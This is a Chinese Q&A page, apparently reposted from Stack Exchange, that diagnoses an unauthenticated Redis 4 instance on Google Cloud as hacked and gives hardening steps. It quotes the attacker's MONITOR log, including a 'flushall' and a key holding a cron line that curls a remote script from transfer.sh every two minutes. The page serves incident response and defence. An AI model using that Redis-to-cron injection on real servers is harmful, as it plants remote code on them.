You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

Google Cloud Compute Engine中Redis 4键自动删除问题求助

你的Redis实例被恶意入侵了!

兄弟,看你贴的MONITOR日志,这根本不是什么“随机自动删除”——你的Redis已经被黑客盯上并入侵了,直接看关键操作:

1525399487.546006 [0 122.114.179.53:55176] "flushall"

这条flushall命令就是清空你所有Redis数据的直接原因!后面紧接着的set命令更危险:

1525399488.214514 [0 122.114.179.53:55176] "set" "Backup1" "\t\n*/2 * * * * curl -s https://transfer.sh/mQnwD/tmp.CG62KO..."

黑客在Redis里写入了定时任务脚本,目的是在你的服务器上执行恶意代码(大概率是挖矿程序或后门)。

为什么会被入侵?

大概率是你的Redis配置犯了几个常见的安全错误:

  • Redis默认绑定0.0.0.0,允许公网任意IP访问,而且你没设置访问密码(日志里没有auth命令就直接执行了flushall)
  • 没有禁用flushall、config这类危险命令,给黑客留了可乘之机

紧急修复步骤,立刻动手!

  1. 先止损:切断公网访问
    • 临时在GCP防火墙规则里,关闭Redis默认端口6379的公网入站权限;
    • 修改Redis配置文件redis.conf,把bind 0.0.0.0改成bind 127.0.0.1,只允许本地访问,然后重启Redis服务。
  2. 设置强访问密码
    在redis.conf里添加或修改:
    requirepass 你的强密码(包含大小写、数字、特殊字符)
    
    重启Redis后,所有客户端连接都必须先执行auth 你的密码才能操作。
  3. 清理恶意内容
    • 登录Redis,执行DEL Backup1删除黑客写入的恶意键;
    • 检查服务器的定时任务:执行crontab -l,如果看到那条curl的定时任务,用crontab -e删掉它。
  4. 加固Redis安全配置
    • 禁用危险命令:在redis.conf里重命名或禁用高危命令,比如:
      rename-command FLUSHALL ""
      rename-command FLUSHDB ""
      rename-command CONFIG ""
      
    • 不要用root用户运行Redis,创建专门的低权限用户来启动;
    • 如果确实需要远程访问,不要直接开放公网,用GCP的VPC内部访问或者VPN,同时配置防火墙IP白名单,只允许可信IP连接。
  5. 检查服务器其他安全隐患
    • 用top或ps aux查看有没有陌生的高CPU进程(比如挖矿程序),找到后直接杀掉;
    • 检查系统登录日志,看看有没有异常的登录记录,及时修补服务器的其他漏洞。

最后提醒

这次只是数据被清空,还算幸运——要是黑客植入了挖矿程序,你的服务器资源会被占满,甚至可能被用来发起攻击。赶紧把以上步骤都落实,别再给黑客留机会!

内容的提问来源于stack exchange,提问作者Flair

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.05.26 10:55:26